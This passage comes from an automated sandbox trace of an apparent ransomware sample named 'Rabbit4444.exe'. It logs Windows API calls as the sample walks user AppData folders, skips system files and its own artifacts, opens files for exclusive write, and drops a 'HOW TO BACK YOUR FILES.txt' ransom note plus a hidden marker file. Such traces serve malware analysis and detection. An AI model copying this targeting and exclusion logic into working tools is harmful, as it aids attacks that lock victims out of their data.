ftLastAccessTime.dwLowDateTime=0xc2aae8a9, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2aae8a9, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0064.918] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0064.918] lstrcpyW (in: lpString1=0x130ec00, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0064.918] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0064.918] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0064.918] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0064.918] lstrlenW (lpString="Rabbit4444") returned 10 [0064.918] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0064.918] lstrlenW (lpString=".dll") returned 4 [0064.918] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0064.918] lstrlenW (lpString=".lnk") returned 4 [0064.919] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0064.919] lstrlenW (lpString=".ini") returned 4 [0064.919] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0064.919] lstrlenW (lpString=".sys") returned 4 [0064.919] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0064.919] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0064.919] GetLastError () returned 0x20 [0064.919] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG1 _CreateFile error 32\r\n") returned 148 [0064.919] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG1 _CreateFile error 32\r\n") returned 148 [0064.919] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.919] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10cc [0064.919] WriteFile (in: hFile=0x2a0, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x94, lpOverlapped=0x0) returned 1 [0064.921] CloseHandle (hObject=0x2a0) returned 1 [0064.922] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0064.922] CloseHandle (hObject=0x0) returned 0 [0064.922] CloseHandle (hObject=0xffffffff) returned 1 [0064.922] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc2aae8a9, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2aae8a9, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2aae8a9, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0064.922] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0064.922] lstrcpyW (in: lpString1=0x130ec00, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0064.922] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0064.922] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0064.922] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0064.922] lstrlenW (lpString="Rabbit4444") returned 10 [0064.922] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0064.923] lstrlenW (lpString=".dll") returned 4 [0064.923] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0064.923] lstrlenW (lpString=".lnk") returned 4 [0064.923] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0064.923] lstrlenW (lpString=".ini") returned 4 [0064.923] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0064.923] lstrlenW (lpString=".sys") returned 4 [0064.923] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0064.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG2" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\settings\\settings.dat.log2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0064.923] GetLastError () returned 0x20 [0064.923] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG2 _CreateFile error 32\r\n") returned 148 [0064.923] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG2 _CreateFile error 32\r\n") returned 148 [0064.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.923] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1160 [0064.923] WriteFile (in: hFile=0x2a0, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x94, lpOverlapped=0x0) returned 1 [0064.925] CloseHandle (hObject=0x2a0) returned 1 [0064.925] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0064.925] CloseHandle (hObject=0x0) returned 0 [0064.925] CloseHandle (hObject=0xffffffff) returned 1 [0064.925] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc2aae8a9, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2aae8a9, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2aae8a9, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0064.926] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.926] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.927] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.927] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.927] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.927] CloseHandle (hObject=0x2a0) returned 1 [0064.927] CloseHandle (hObject=0x2cc) returned 1 [0064.927] GetCurrentThreadId () returned 0xd98 [0064.927] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0064.927] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState" [0064.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0064.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0064.927] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState" [0064.927] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\" [0064.927] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0064.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.929] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.931] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.931] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.932] CloseHandle (hObject=0x2cc) returned 1 [0064.932] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState") returned 103 [0064.932] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.932] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12cb203, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf005df4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.932] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.932] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.932] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.932] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.932] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12cb203, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf005df4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.933] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.933] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.933] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.933] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.933] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.933] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf005df4b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf005df4b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf005df4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.933] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.933] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.933] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf005df4b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf005df4b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf005df4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.933] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.933] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.933] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.933] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.934] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.934] CloseHandle (hObject=0x2a0) returned 1 [0064.934] CloseHandle (hObject=0x2cc) returned 1 [0064.934] GetCurrentThreadId () returned 0xd98 [0064.934] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0064.934] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState" [0064.934] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0064.934] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0064.934] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState" [0064.934] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\" [0064.934] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0064.934] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.936] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.939] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.939] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.940] CloseHandle (hObject=0x2cc) returned 1 [0064.940] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState") returned 101 [0064.940] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.940] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12ca805, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf005df4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0064.940] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.940] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.940] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.940] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.941] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12ca805, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf005df4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.941] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.941] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.941] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.941] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.941] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.941] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf005df4b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf005df4b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0083f25, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.941] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.941] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.941] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf005df4b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf005df4b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0083f25, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.941] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0064.941] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.941] CreateFileW 